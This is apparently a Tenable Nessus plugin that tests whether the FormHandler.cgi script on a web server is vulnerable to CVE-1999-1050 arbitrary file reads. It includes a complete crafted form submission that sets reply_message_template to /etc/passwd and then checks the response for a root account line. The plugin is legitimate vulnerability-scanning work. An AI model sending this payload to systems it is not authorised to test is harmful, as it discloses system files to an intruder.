CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
Percentile
88.9%
The ‘FormHandler.cgi’ CGI application installed on the remote host is affected by an information disclosure vulnerability that lets anyone read arbitrary files with the privileges of the web server. An unauthenticated, remote attacker can exploit this to disclose sensitive information, which could be used to facilitate further attacks.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration block. When the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script exits (exit(0) at
# the end of the block) before any of the network code further down runs.
if(description)
{
script_id(10075);
script_version("1.42");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
# Advisory identifiers for the finding; cvss_score_source below points at the
# same CVE entry.
script_cve_id("CVE-1999-1050");
script_bugtraq_id(799);
script_name(english:"Matt Wright FormHandler.cgi Arbitrary File Access");
# The summary states what the check does on the wire: it attempts a real file
# read, it does not infer the finding from a banner or version string.
script_summary(english:"Attempts to read /etc/passwd.");
script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host is affected by an information
disclosure vulnerability." );
script_set_attribute(attribute:"description", value:
"The 'FormHandler.cgi' CGI application installed on the remote host is
affected by an information disclosure vulnerability that lets anyone
read arbitrary files with the privileges of the web server. An
unauthenticated, remote attacker can exploit this to disclose
sensitive information, which could be used to facilitate further
attacks.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/166");
# Removal is the only remediation offered; no fixed version is referenced.
# The temporal vectors below (RL:U) likewise record no available fix.
script_set_attribute(attribute:"solution", value:
"Remove FormHandler.cgi from the web server.");
# Base vectors: reachable over the network, low complexity, no authentication,
# confidentiality impact only (partial in CVSS2, low in CVSS3). The score
# covers the file read itself, not the follow-on use of what is disclosed
# that the description mentions.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:U/RC:X");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-1999-1050");
script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/11");
script_set_attribute(attribute:"plugin_publication_date", value: "1999/12/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
# Classed as an active attack test, consistent with the summary above: the
# check submits a crafted form to the target rather than passively
# fingerprinting it.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 1999-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
# NOTE(review): smtp_settings.nasl presumably populates the
# "Settings/third_party_domain" KB item that the check reads later; confirm.
script_dependencie("http_version.nasl", "smtp_settings.nasl");
# NOTE(review): presumably limits the run to hosts with a detected web
# service or port 80; confirm against the scanner's port-requirement rules.
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Active check: one form submission is sent to FormHandler.cgi and the HTTP
# response body is searched for a passwd-style root entry.
#
# Reviewer notes for anyone interpreting results:
#  - Coverage: only the web-root path /FormHandler.cgi is requested. A copy
#    installed under another directory is not probed by this script, so a
#    clean result here does not show that the CGI is absent from the host.
#  - Side effect: the form names a recipient and a reply-from address at the
#    configured third-party domain. NOTE(review): a working form handler will
#    presumably try to send mail to that address; confirm, and set
#    "Settings/third_party_domain" to a domain you control before scanning.
#  - Evidence: security_warning() is called with the port only, so the
#    matched line is not attached to the finding.
www_port = get_http_port(default:80);

# Domain used in the form's addresses and redirect target; falls back to
# example.com when the KB item is unset.
mail_domain = get_kb_item("Settings/third_party_domain");
if (!mail_domain)
{
  mail_domain = "example.com";
}

cgi_path = '/FormHandler.cgi';
req_headers = make_array("Content-type", "application/x-www-form-urlencoded");

# The same URL-encoded address (nessus@<domain>) is used for both the
# reply-from and the recipient fields. The domain is inserted as-is, without
# URL-encoding.
probe_addr = string("nessus%40", mail_domain);
form_body = string(
  "realname=", SCRIPT_NAME, "&",
  "email=aaa&",
  "reply_message_template=%2Fetc%2Fpasswd&",
  "reply_message_from=", probe_addr, "&",
  "redirect=http%3A%2F%2Fwww.", mail_domain, "&",
  "recipient=", probe_addr
);

reply = http_send_recv3(
  method:"POST",
  item:cgi_path,
  port:www_port,
  add_headers:req_headers,
  data:form_body
);

# No response at all is reported as an error exit, not as "not affected".
if (isnull(reply))
{
  exit(1, "The server on port "+www_port+" didn't respond.");
}

# Detection signal: a line in the body (reply[2]) shaped like a root account
# entry with uid 0 and gid 0 or 1. Any page that echoes such a line would also
# match, so confirm positives by checking that the CGI is actually installed.
# When nothing matches, the script ends without reporting.
passwd_hit = egrep(pattern:"root:.*:0:[01]:.*", string:reply[2]);
if (passwd_hit)
{
  security_warning(www_port);
}